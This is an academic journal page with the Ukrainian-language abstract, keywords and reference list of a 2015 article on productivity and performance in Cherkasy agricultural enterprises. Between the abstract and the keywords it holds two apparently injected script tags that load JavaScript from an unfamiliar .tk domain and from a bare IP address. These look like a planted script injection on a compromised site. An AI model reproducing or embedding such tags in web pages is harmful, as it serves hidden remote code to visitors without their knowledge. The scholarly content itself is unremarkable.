ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.43(477):338.312
Економіка агропромислового виробництва

Продуктивність у системі результативності господарювання / Вакуліна Ю.В. // Економіка АПК. - 2015. - № 12 - С. 19

Досліджено роль системи результативності в діяльності підприємств. Проаналізовано підсистеми результативності, що включають дієвість, економічність, якість, прибутковість, ефективність, продуктивність та якість трудового життя. Оскільки в основі економічних явищ є людина, важливим є створення комфортних умов її діяльності на робочому місці. Саме тому детально охарактеризовано складові якості трудового життя сільськогосподарського працівника. На прикладі сільськогосподарських підприємств Черкаської області проаналізовано рівень продуктивності живої та уречевленої праці, а також основних факторів, що сприяють підвищенню продуктивності. Актуальним є розробка теоретико-методологічної моделі процесу управління продуктивністю в контексті результативності на рівні підприємства, об’єднання, галузі, країни в цілому. Також визначено основні проблеми у трактуванні терміна «продуктивність» та методах її визначення залежно від суб’єктів аналізу. Табл.: 2. Рис.: 5. Бібліогр.: 14.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: результативність, продуктивність, якість, прибутковість, дієвість, якість трудового життя

Список використаних джерел

 1. Акофф Р. Планирование будущего корпорации / Р. Акофф. - М.: Прогресс, 1985. - 328 с.
 2. Вітвіцький В.В. Аспекти теорії вимірювання продуктивності живої та минулої праці у сільському господарстві / В. В. Вітвіцький // Україна: аспекти праці. - 2013. - № 8. - С. 18-24.
 3. Вітвіцький В.В. Концепція продуктивності як інтегрованого показника ефективності / В. В. Вітвіцький // Актуальні проблеми економіки. - 2005. - № 10. - С. 53-60.
 4. Дієсперов В.С. Продуктивність сільськогосподарської праці [Текст] : моногр. / В.С. Дієсперов. - К. : ІАЕ, 2006. - 274 с.
 5. Peters, Thomas J.;Waterman, Robert H. JR. In Search of Excellence: Lessons from America&apos;s Best-Run Companies. Warner Books Inc. 1984. - P. 360.
 6. Scott D. Sink Productivity Management: Planning, Evaluation, Control, and Improvement. John Wiley &amp; Sons, 1985 - pp.518
 7. Сумець О. М. Основи операційного менеджменту: підруч. / О. М. Сумець ; Мін. освіти і науки України, Нар. укр. акад. - К. : Професіонал, 2004. - 414 с.
 8. Сухаревський В.С. Менеджмент: теорія, методологія та практика: Монографія. / В.С. Сухаревський - 2004. - 166 с.
 9. William G. Oughi Theory Z: How American Business Can Meet the Japanese Challenge. Avon Books (P), 1993. - P. 255.
 10. Richard N. Foster Innovation: The Attacker&apos;s Advantage. Summit Books. 1986. - P. 316.
 11. Richard B. Chase, Nicholas J. Aquilano, Robert F. Jacobs Production and Operations Management: Manufacturing and Services, 7th Edition.1995 - 853 p.
 12. Шаповал Н.Л. Менеджмент якості: підруч. / Н.Л. Шаповал. - К. : Т-во «Знання» ЛЩЩ, 2003. - 476 с.
 13. Егоршин А.П. Основы управления персоналом / А.П. Егоршин. - Н. Новгород : НИМБ, 2003. - 297 с.
 14. Генкин Б.М. Экономика и социология труда/ Б.М. Генкин. - М.: НОРМА-ИНФРАМ, 1999. - 412 с.
Читати статтю: 5.pdf